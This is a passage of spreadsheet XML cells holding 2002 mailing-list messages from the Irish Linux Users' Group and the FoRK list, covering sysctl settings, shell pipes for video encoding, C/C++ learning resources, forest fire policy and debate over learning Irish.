    <t>With Mobile IP?  Ack! 8-O\n\n[URL]http://ana-www.lcs.mit.edu[/URL]\n\nMB\n-- \nMark Baker, CTO, Idokorro Mobile (formerly Planetfred)\nOttawa, Ontario, CANADA.               distobj@acm.org\n[URL]http://www.markbaker.ca[/URL]        [URL]http://www.idokorro.com[/URL]\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://ana-www.lcs.mit.edu http://www.markbaker.ca http://www.idokorro.com http://xent.com</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 31 Jul 2002 16:27:28 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:27:28 +0100</t>
  </si>
  <si>
    <t>"John P. Looney" &lt;valen@tuatha.org&gt;</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 04:24:17PM +0100, Kenn Humborg mentioned:\n&gt; man sysctl\n&gt;    # sysctl -p\n\n Ah right. Actually, sysctl -a was more helpful - shows why setting\nsys.fs.files-nr didn't work..\n\nKAte\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Kenn Humborg" &lt;kenn@bluetree.ie&gt;\nDate: Wed, 31 Jul 2002 16:24:17 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:24:17 +0100</t>
  </si>
  <si>
    <t>"Kenn Humborg" &lt;kenn@bluetree.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] sysctl.conf</t>
  </si>
  <si>
    <t>&gt;  OK, I guess that sysctl.conf is the best way of setting\n&gt;\n&gt;     /proc/sys/fs/file-max\n&gt;\n&gt;  to a nice big number. Can you make a change to /etc/sysctl.conf, and then\n&gt; have it take effect, without a reboot (to test it, really) ?\n\nman sysctl\n\n   # sysctl -p\n\nLater,\nKenn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Waider &lt;waider@waider.ie&gt;\nDate: Wed, 31 Jul 2002 16:22:31 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:22:31 +0100</t>
  </si>
  <si>
    <t>Waider &lt;waider@waider.ie&gt;</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt;  OK, I guess that sysctl.conf is the best way of setting \n&gt; \n&gt;     /proc/sys/fs/file-max\n&gt; \n&gt;  to a nice big number. Can you make a change to /etc/sysctl.conf, and then\n&gt; have it take effect, without a reboot (to test it, really) ?\n&gt; \n&gt; John\n&gt; \n&gt; \n\nHave a look at the manual page for the sysctl command?\n\nCheers,\nWaider.\n-- \nwaider@waider.ie / Yes, it /is/ very personal of me\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG list &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 31 Jul 2002 16:22:11 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 16:22:11 +0100</t>
  </si>
  <si>
    <t>Irish LUG list &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] sysctl.conf</t>
  </si>
  <si>
    <t>OK, I guess that sysctl.conf is the best way of setting \n\n    /proc/sys/fs/file-max\n\n to a nice big number. Can you make a change to /etc/sysctl.conf, and then\nhave it take effect, without a reboot (to test it, really) ?\n\nJohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: "Gregory Alan Bolcer" &lt;gbolcer@endeavors.com&gt;\nDate: Wed, 31 Jul 2002 15:28:42 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 15:28:42 -0700</t>
  </si>
  <si>
    <t>"Gregory Alan Bolcer" &lt;gbolcer@endeavors.com&gt;</t>
  </si>
  <si>
    <t>Re: RealNames ceases trading</t>
  </si>
  <si>
    <t>This comment probably goes into better late than never but:\nI wonder if their decision to open source their code had\nanything to do with it.\n\nI've read through their asset sheet, but it doesn't say anything\nabout their real assets--their customers.  Anyone know if they\nhave any left?\n\nGreg\n\nJim Whitehead wrote:\n\n&gt; Via Dave's Scripting News:\n&gt; \n&gt; [URL]http://www.theregister.co.uk[/URL]\n&gt; \n&gt; RealNames Corp., the VC-funded wheeze that promised to short-circuit the DNS\n&gt; system by doing an exclusive deal with Microsoft, has announced that it will\n&gt; cease trading as of today.\n&gt; \n&gt; RealNames' proposition was simple, and on the face of it, a no-brainer. Type\n&gt; a real word or phrase into your browser and it would guide you to your\n&gt; destination, bypassing all this cumbersome domain name business. A nice\n&gt; idea, but one based on the assumption that people are fairly stupid, and\n&gt; couldn't figure out that Comp USA's website might be say, CompUSA.com, and\n&gt; that even if you mistook whitehouse.gov for whitehouse.org, you'd be unhappy\n&gt; about the serendipitous diversion.\n&gt; \n&gt; *snip*\n&gt; \n&gt; Microsoft cancelled its contract with RealNames earlier this year, and as a\n&gt; consequence - the company has no "Plan B" - it's now toast.\n&gt; \n&gt; - Jim\n&gt; \n&gt; \n&gt; \n&gt; [URL]http://xent.com[/URL]\n&gt; \n&gt; \n\n\n-- \nGregory Alan Bolcer, CTO   | work: +1.949.833.2800 | gbolcer at endeavors.com\nEndeavors Technology, Inc. | cell: +1.714.928.5476 | [URL]http://endeavors.com[/URL]\n\n\n\n\n\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.theregister.co.uk http://xent.com http://endeavors.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Wed, 31 Jul 2002 15:16:20 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 15:16:20 -0700</t>
  </si>
  <si>
    <t>Elias Sinderson &lt;elias@cse.ucsc.edu&gt;</t>
  </si>
  <si>
    <t>Heh. Never mind the perfectly good desert in the southwest, right? Or is \nthat area too hot for desert warfare training? I'll never understand.\n\nE\n\nCDale wrote:\n\n&gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of \n&gt;acres of virgin pine forest that was razed here in MS so that our military \n&gt;can practice desert warfare?  Fought it for years, lost, now there is a \n&gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact \n&gt;that a huge portion of the Desoto Ntl. Forest is gone.\n&gt;\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Irish Linux Users Group &lt;ilug@linux.ie&gt;\nFrom: Ronan Cunniffe &lt;ronan@cunniffe.net&gt;\nDate: Wed, 31 Jul 2002 15:13:23 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 15:13:23 +0100</t>
  </si>
  <si>
    <t>Ronan Cunniffe &lt;ronan@cunniffe.net&gt;</t>
  </si>
  <si>
    <t>Quoting Brian Foster : &gt;   | I did the following: &gt;   |  &gt;  1|   $ mkfifo f1 &gt;  2|   $ lav2yuv capture.avi | yuvdenoise | tee f1 | mpeg2enc blah blah &amp; &gt;  3|   $ cat f1 | mpeg2enc different blah blah &gt;   |  &gt;   | And hey! It works!  Until somebody dies!  Yippe... oh.  [ ... ] &gt;  &gt;  ( a winner of the Useless Use of cat(1) Award:  you don't need &gt;   the `cat f1 |' in the 3rd line, a simple `  upshot is a POSIX.2 `tee' would probably spit out an error &gt;  message if one of the `mpeg2enc's dies, but the remaining &gt;  one would continue to be fed data and hence run until it &gt;  either completes or dies for reasons of its own.  which is &gt;  exactly what you want!   so what is happening??   Oops. Um, my test was to tee to a fifo I didn't read from... resulting in the other reader hanging around forever.... not realising that never-opened-for-reading and opened-and-later-closed might be different.  Sensible behaviour has now been observed.   &gt;  incidently, if your shell and system both support process &gt;  redirection, you could do the above as a one-liner.  syntax &gt;  varies depending on the shell, but in bash(1) and ksh(1): &gt;  &gt;      lav2yuv capture.avi | yuvdenoise | \ &gt;          tee &gt;(mpeg2enc different blah blah) | mpeg2enc blah blah mpeg2enc generates stats during the run, so I give each one an xterm. Thanks, Ronan --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Marty Halvorson &lt;marty@halvorson.us&gt;\nDate: Wed, 31 Jul 2002 13:22:19 -0600</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 13:22:19 -0600</t>
  </si>
  <si>
    <t>Marty Halvorson &lt;marty@halvorson.us&gt;</t>
  </si>
  <si>
    <t>Ned Jackson Lovely wrote:\n &gt; On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote:\n &gt; &gt; A Forest Service official has stated flat out that the tree lovers \nneed to\n &gt; &gt; understand their responsibility in contributing to the number of\n &gt; &gt; uncontrollable (i.e., crown fires caused by very dense tree stands and\n &gt; &gt; under growth) fires by their suits to stop any tree removal from the\n &gt; &gt; forests managed by the Forest Service.\n &gt;\n &gt; Boy, that is rather strange. I've always been under the impression that\n &gt; the uncontrollable forest fires were the result of the Forest Service's\n &gt; long-standing "10:00 A.M. policy"\n\nIf you'll look closely, I said the Forest Service official claimed it was \nthe tree lovers lawsuits that prevented removal of trees by any means as at \nleast partially responsible.  The lawsuits prevented the Forest Service \nfrom implementation of any project that involved tree removal.  These \nprojects were designed to address the tree and undergrowth density that \nresulted from previous management policies.\n\nIn other words, Forest Service projects to clean up the mess resulting from \ntheir previous forest management practices are prevented by tree lover \nlawsuits.\n\n &gt; 40 years after the end of the containment policy there is still a lot of \nstuff\n &gt; left to burn.\n\nExactly, and tree lover lawsuits are preventing the removal of that \nstuff.  The result:  Fires like Cerro Grande.\n\n &gt; I can't imagine that artificially planted replacement\n &gt; forests ...\n\nThere are very few replacement forests planted these days.  Those that are, \nare mostly planted on private land as commercial tree farms.\n\nPeace,\n\nMarty Halvorson\nmarty@halvorson.us\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Ned Jackson Lovely &lt;fork@qu.to&gt;\nDate: Wed, 31 Jul 2002 13:13:23 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 13:13:23 -0400</t>
  </si>
  <si>
    <t>Ned Jackson Lovely &lt;fork@qu.to&gt;</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 10:37:31AM -0600, Marty Halvorson wrote:\n&gt; A Forest Service official has stated flat out that the tree lovers need to \n&gt; understand their responsibility in contributing to the number of \n&gt; uncontrollable (i.e., crown fires caused by very dense tree stands and \n&gt; under growth) fires by their suits to stop any tree removal from the \n&gt; forests managed by the Forest Service.\n\nBoy, that is rather strange. I've always been under the impression that\nthe uncontrollable forest fires were the result of the Forest Service's\nlong-standing "10:00 A.M. policy", in place until the decision in 1963 to\nswitch over to "let-it-burn".\n\nThe 10:00 A.M. policy was based on theories about forest management from\nEurope, and wasn't as applicable to the American wilds. So, we went from a\npolicy of containment for 100 years to one of letting things burn unless they\ndirectly threatened property.\n\n40 years after the end of the containment policy there is still a lot of stuff\nleft to burn. I can't imagine that artificially planted replacement\nforests, with dense stands of identical trees, help that much either. \n\nI would be comfortable laying the fault for these contributing factors\nsquarely with the Forest Service. I would put the blame for many burned homes\nupon the people who chose to build their dwelling with an unwise combination of\nmaterials, location, and landscaping.\n\n-- \nnjl\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Wed, 31 Jul 2002 12:51:29 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:51:29 +0200</t>
  </si>
  <si>
    <t>ILUG &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] C++ and C Mailing Lists for Beginners and Advanced</t>
  </si>
  <si>
    <t>SoloCDM wrote:\n&gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners\n&gt; and Advanced programmers?\n\nTry the following newsgroups - \nBeginners:\nnews:comp.lang.learn.c-c++\n\nMore advanced: \nnews:comp.lang.c\nnews:comp.lang.c++\nnews:comp.lang.c.moderated\n\nAlso, you should keep a bookmark pointing at the comp.lang.c FAQ at \n[URL]http://www.eskimo.com[/URL]\n\nFor tutorials, the guy who maintains the clc FAQ (Steve Summit)\nhas a tutorial - [URL]http://www.eskimo.com[/URL]\nAlso you could have a look at the excercises he poses - all\nlinked from [URL]http://www.eskimo.com[/URL]\n\nFor C++, I would guess that the comp.lang.c++ FAQ is a good place\nto start - they're likely to have links to suggested reading\nmaterial.\n\nIf you're going to do any amount of C programming, you should\nthink about getting K&amp;R2 (The C programming language, 2nd\nedition, by Kernighan and Ritchie), for C++ the equivalent book\nis Stroustrup. Although the C++ book is a lot bigger :)\n\nHope this helps,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.eskimo.com http://www.eskimo.com http://www.eskimo.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Wed, 31 Jul 2002 12:44:59 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:44:59 +0200</t>
  </si>
  <si>
    <t>Irish LUG &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Fwd: Linux Beer Hike</t>
  </si>
  <si>
    <t>Satelle, StevenX wrote:\n&gt; When I was in school they pushed Irish down my throat. I developed a hatred\n&gt; for Irish. I did French for 3 years and German for 6 months, I could\n&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know\n&gt; one word of Irish. \n\nWell, I'm hardly a Gaeilgir, but in general I wouldn't consider\neither ability or inability in a language something to be proud\nof... maybe it's just me, but I'm not proud that I can't speak\nItalian, no more than I'm proud that I can speak French or\nEnglish.\n\nCheers,\nDave.\n\n-- \n       David Neary,\n    Marseille, France\n  E-Mail: bolsh@gimp.org\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug social &lt;social@linux.ie&gt;\nFrom: kevin lyda &lt;kevin+dated+1028547504.d51096@linux.ie&gt;\nDate: Wed, 31 Jul 2002 12:38:22 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:38:22 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1028547504.d51096@linux.ie&gt;</t>
  </si>
  <si>
    <t>ilug social &lt;social@linux.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG-Social] Re: [ILUG] Fwd: Linux Beer Hike</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 12:04:44PM +0100, Alan Horkan wrote:\n&gt; does Spanish still count as a foreign language in America?\n&gt; :)\n\nyep, that's what i learned as it seemed more useful then the other\nchoice: french.  and that's what seems to count as "internationalisation":\nsupport of spanish.\n\n&gt; Watch out for the political indoctrination at these irish language\n&gt; schools, when i was teenager they had use marching saluting the flag\n&gt; singing the national anthem and the college anthem.  Presumably they treat\n&gt; adult learners with a little more dignity and dont send them home for a\n&gt; minor outburst of English in emotional circustances despite having better\n&gt; Irish than half of the other people there.\n\nif i go to a class, i'm there to learn.  if they throw in anthems or\npolitics, i'll take what i can learn from that and i'll take in a new\nperspective, but i'll only do that with my critical thinking cap on.\njust like i do when i watch mass media.  and yes, from the one irish\ncourse i took in dublin, they do the national anthem.  which is fine\nreally - i started off each day in school in america with the pledge of\nallegience (with the under god bit in it which annoyed my dad to no end).\nif that sort of thing didn't stick at the age of five, i severely doubt\nit will stick now.\n\n&gt; Just to mention open source software agus gaeilge, OpenOffice could do\n&gt; with having an Irish ispell dictionary converted to work with it.\n&gt; Abiword already has irish spell checking and a few of the interface\n&gt; strings translated (was about 85% about 18 months ago but it has drifted\n&gt; to some horribly small percentage).\n\nand see, that would be my retort to any overly zealous irish speaker.\nthere's a huge opportunity for a fully irish computing environment in\nfree software.  and yet i don't see much action from official irish\norganisations.  the reason mandrake and some others have the irish\nsupport they have is because of individuals like donnacha.\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Social Events: social@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Satelle, StevenX" &lt;stevenx.satelle@intel.com&gt;\nDate: Wed, 31 Jul 2002 12:33:17 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:33:17 +0100</t>
  </si>
  <si>
    <t>"Satelle, StevenX" &lt;stevenx.satelle@intel.com&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] Fwd: Linux Beer Hike</t>
  </si>
  <si>
    <t>I have 3rd degree burn scars on both hands. I can hold that match if I want\nto :-)\n\n-----Original Message-----\nFrom: John P. Looney [mailto:valen@tuatha.org]\nSent: 31 July 2002 12:26\nTo: Irish LUG\nSubject: Re: [ILUG] Fwd: Linux Beer Hike\n\n\nOn Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:\n&gt; I dislike being forced to learn something and mostly refuse to do it. \n\n Did you burn yourself often, as a child ?\n\nJohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.linux.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 31 Jul 2002 12:25:41 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:25:41 +0100</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 12:02:01PM +0100, Satelle, StevenX mentioned:\n&gt; I dislike being forced to learn something and mostly refuse to do it. \n\n Did you burn yourself often, as a child ?\n\nJohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: caolan@csn.ul.ie (Caolan McNamara)\nDate: Wed, 31 Jul 2002 12:22:03 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 12:22:03 +0100</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 12:51:29 +0200, David Neary wrote:\n&gt; SoloCDM wrote:\n&gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners\n&gt; &gt; and Advanced programmers?\n&gt; \n&gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place\n&gt; to start - they're likely to have links to suggested reading\n&gt; material.\n&gt; \n&gt; If you're going to do any amount of C programming, you should\n&gt; think about getting K&amp;R2 (The C programming language, 2nd\n&gt; edition, by Kernighan and Ritchie), for C++ the equivalent book\n&gt; is Stroustrup. Although the C++ book is a lot bigger :)\n\nFor C++, guru of the week at \n[URL]http://www.gotw.ca[/URL] (can get them in book form and\nwith extra material as Herb Sutters Essential C++ and More Essential C++)\nis a good resource. \n\nScott Meyers Effective C++, More Effective C++ and Effective STL\nare truly handy books.\n\nI always felt that The C++ faq wasn't as good as the C faq, but\nit lives at [URL]http://www.parashift.com[/URL]\n\nC.\n-- \nCaolan McNamara               |  caolan@skynet.ie  \n[URL]http://www.skynet.ie[/URL]  |  +353 86 8161184\nVerbing weirds language\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.gotw.ca http://www.parashift.com http://www.skynet.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG &lt;ilug@linux.ie&gt;\nFrom: "David O'Callaghan" &lt;ocalladw@tcd.ie&gt;\nDate: Wed, 31 Jul 2002 11:54:30 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:54:30 +0100</t>
  </si>
  <si>
    <t>"David O'Callaghan" &lt;ocalladw@tcd.ie&gt;</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX wrote:\n&gt; When I was in school they pushed Irish down my throat. I developed a hatred\n&gt; for Irish. I did French for 3 years and German for 6 months, I could\n&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know\n&gt; one word of Irish. \n\nGoing rapidly OT here, but I find it shocking that anybody could be\nproud of not knowing something. It's like the tourist on holidays using\nthat speak-loudly-enough-and-they-will-understand technique or (slightly\nless off-topic) the friend or relative who says "I know nothing\nabout computers!" and clearly doesn't intend to learn, and is happy\nto let you clean up after them.\n\nI certainly agree that Irish is not taught all that well (or wasn't\nwhen I was in school) but I'd like to be able to relearn it and to\ncount it as one of my skills.\n\nDavid\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ILUG &lt;ilug@linux.ie&gt;\nFrom: kevin lyda &lt;kevin+dated+1028544820.c7b215@linux.ie&gt;\nDate: Wed, 31 Jul 2002 11:53:38 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:53:38 +0100</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1028544820.c7b215@linux.ie&gt;</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 12:51:29PM +0200, David Neary wrote:\n&gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at \n&gt; [URL]http://www.eskimo.com[/URL]\n\nand don't forget the c iaq.  that's here:\n\n    [URL]http://www.plethora.net[/URL]\n\nan example:\n\n    1.3: If I write the code int i, j; can I assume that (&amp;i + 1) == &amp;j?\n\n    Only sometimes. It's not portable, because in EBCDIC, i and j are not\n    adjacent.\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ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.eskimo.com http://www.plethora.net http://ie.suberic.net http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Irish LUG &lt;ilug@linux.ie&gt;\nFrom: "John P. Looney" &lt;valen@tuatha.org&gt;\nDate: Wed, 31 Jul 2002 11:43:49 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:43:49 +0100</t>
  </si>
  <si>
    <t>On Wed, Jul 31, 2002 at 11:28:05AM +0100, Satelle, StevenX mentioned:\n&gt; When I was in school they pushed Irish down my throat. I developed a hatred\n&gt; for Irish. I did French for 3 years and German for 6 months, I could\n&gt; (almost) hold a basic conversation. I am proud of the fact that I don't know\n&gt; one word of Irish. \n\n Sad, that.\n\n I felt like that till recently, but now wish that it wasn't rammed down\nmy throat like worming tablets. If they hadn't, it is very possible I'd be\nan Irish speaker.\n\nJohn\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: David Neary &lt;dneary@wanadoo.fr&gt;\nFrom: SoloCDM &lt;deedsmis@aculink.net&gt;\nDate: Wed, 31 Jul 2002 11:28:56 -0600</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:28:56 -0600</t>
  </si>
  <si>
    <t>[ILUG] Re: C++ and C Mailing Lists for Beginners and Advanced</t>
  </si>
  <si>
    <t>David Neary stated the following:\n&gt; \n&gt; SoloCDM wrote:\n&gt; \n&gt; &gt; Are there any mailing lists (non-newsgroups) for C++ and C Beginners\n&gt; &gt; and Advanced programmers?\n&gt; \n&gt; Try the following newsgroups - Beginners: news:comp.lang.learn.c-c++\n\nI tried news:comp.lang.learn.c-c++ and it wouldn't work.  Is there a\ntypo?\n\n&gt; More advanced: news:comp.lang.c news:comp.lang.c++\n&gt; news:comp.lang.c.moderated\n&gt; \n&gt; Also, you should keep a bookmark pointing at the comp.lang.c FAQ at\n&gt; [URL]http://www.eskimo.com[/URL]\n&gt; \n&gt; For tutorials, the guy who maintains the clc FAQ (Steve Summit) has\n&gt; a tutorial - [URL]http://www.eskimo.com[/URL] Also\n&gt; you could have a look at the excercises he poses - all linked from\n&gt; [URL]http://www.eskimo.com[/URL]\n&gt; \n&gt; For C++, I would guess that the comp.lang.c++ FAQ is a good place to\n&gt; start - they're likely to have links to suggested reading material.\n&gt; \n&gt; If you're going to do any amount of C programming, you should\n&gt; think about getting K&amp;R2 (The C programming language, 2nd edition,\n&gt; by Kernighan and Ritchie), for C++ the equivalent book is\n&gt; Stroustrup. Although the C++ book is a lot bigger :)\n\n-- \nNote: When you reply to this message, please include the mailing\n      list and/or newsgroup address and my email address in To:\n\n*********************************************************************\nSigned,\nSoloCDM\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'Wynne, Conor'" &lt;conor_wynne@maxtor.com&gt;,\nFrom: "Satelle, StevenX" &lt;stevenx.satelle@intel.com&gt;\nDate: Wed, 31 Jul 2002 11:28:05 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:28:05 +0100</t>
  </si>
  <si>
    <t>"'Wynne, Conor'" &lt;conor_wynne@maxtor.com&gt;,</t>
  </si>
  <si>
    <t>When I was in school they pushed Irish down my throat. I developed a hatred\nfor Irish. I did French for 3 years and German for 6 months, I could\n(almost) hold a basic conversation. I am proud of the fact that I don't know\none word of Irish. \n\n-----Original Message-----\nFrom: Wynne, Conor [mailto:conor_wynne@maxtor.com]\nSent: 31 July 2002 09:56\nTo: 'Patton, Tony'; Irish LUG\nSubject: RE: [ILUG] Fwd: Linux Beer Hike\n\n\nI am the evil one, you will respect my authoritai ;--)\n\nSorry, but I couldn't resist, I must say that mails like this really impress\nme. coz I have pretty much no Irish at all, although my wee Girl starts\nGaelscoil in September so there hope for me yet :)\n\nMuch Respect to the Gaeilgors out there. \n\nCW\n\n-------------------\nmar\n&gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le\n&gt; Gaeilge ar an Hike go bhfios duit?\n&gt; \n&gt; Go raibh maith agat as do chabhair,\n&gt; \n\n----&gt;8\n\nCan someone translate this for me? Lost all sense of Irish when moved\nover the border about 10 years ago. Not by choice mind you :-(\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Nick Murtagh" &lt;nickm@go2.ie&gt;, &lt;webdev@linux.ie&gt;\nFrom: "William Harrison - Protocol" &lt;wharrison@pro.ie&gt;\nDate: Wed, 31 Jul 2002 11:05:44 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 11:05:44 +0100</t>
  </si>
  <si>
    <t>"William Harrison - Protocol" &lt;wharrison@pro.ie&gt;</t>
  </si>
  <si>
    <t>"Nick Murtagh" &lt;nickm@go2.ie&gt;, &lt;webdev@linux.ie&gt;</t>
  </si>
  <si>
    <t>RE: [Webdev] Migrating TO W2K</t>
  </si>
  <si>
    <t>Hi Nick\n\nTry PHPTriad\n\n [URL]http://download.com.com[/URL]\n\n"PHPTriad is a complete PHP development and server environment for Windows.\nIt installs PHP, Apache, MySQL, and PHPMyAdmin, both installing and setting\nup the environment. Version 2.11 updates all components and it now includes\nPerl 5."\n\nHTH\n\nWill\n\n\n\n\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>http://download.com.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Kenn Humborg" &lt;kenn@bluetree.ie&gt;\nDate: Wed, 31 Jul 2002 10:58:47 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 10:58:47 +0100</t>
  </si>
  <si>
    <t>RE: [ILUG] Installing lilo on another disk.</t>
  </si>
  <si>
